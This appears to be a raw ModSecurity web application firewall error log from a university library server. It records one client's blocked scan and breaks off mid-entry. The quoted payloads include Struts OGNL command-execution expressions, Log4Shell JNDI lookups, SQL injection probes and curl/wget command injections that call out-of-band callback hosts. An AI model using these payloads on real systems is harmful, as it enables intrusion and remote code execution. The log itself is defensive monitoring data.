[Tue Aug 29 11:33:46.296980 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAASEJPMAAAAE"]
[Tue Aug 29 11:33:47.379014 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg8dpdg6z5zeqz6.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAANsAlgAAAAD"]
[Tue Aug 29 11:33:48.305511 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilibfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAASFedUAAAAG"]
[Tue Aug 29 11:33:48.312607 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgnm9uq3pq4enb1.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAAR@KH8AAAAF"]
[Tue Aug 29 11:33:49.306649 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgzy9to8r6ud15c.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARo83wAAAAT"]
[Tue Aug 29 11:33:49.316115 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilibfeb.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAARdiMQAAAAK"]
[Tue Aug 29 11:33:50.366957 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "digilibfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAARtACQAAAAV"]
[Tue Aug 29 11:33:50.367468 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgu3s4151btkr9w.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAASFeeAAAAAG"]
[Tue Aug 29 11:33:51.354397 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilibfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAASFeeUAAAAG"]
[Tue Aug 29 11:33:52.308172 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAASEJQ0AAAAE"]
[Tue Aug 29 11:33:52.531985 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilibfeb.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAASEJRUAAAAE"]
[Tue Aug 29 11:33:53.292926 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlg915qzojie8adz.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAANsAmkAAAAD"]
[Tue Aug 29 11:33:53.323585 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgmomdkhybxhsp1.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAARy-1IAAAAb"]
[Tue Aug 29 11:33:53.378689 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "digilibfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARjjTYAAAAL"]
[Tue Aug 29 11:33:54.383610 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAAPDoK4AAAAP"]
[Tue Aug 29 11:33:54.418405 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilibfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAARy-1sAAAAb"]
[Tue Aug 29 11:33:55.309143 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAARQ4EwAAAAB"]
[Tue Aug 29 11:33:55.347968 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilibfeb.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARy-14AAAAb"]
[Tue Aug 29 11:33:57.148758 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgamgow7z3gy6rk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAASHh3cAAAAD"]
[Tue Aug 29 11:33:57.676470 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "digilibfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASHh40AAAAD"]
[Tue Aug 29 11:33:58.047947 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAARxOtMAAAAa"]
[Tue Aug 29 11:33:59.101918 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASPDJMAAAAS"]
[Tue Aug 29 11:33:59.337031 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAARy-5MAAAAb"]
[Tue Aug 29 11:34:00.351472 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAAST4-MAAAAZ"]
[Tue Aug 29 11:34:01.408158 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri 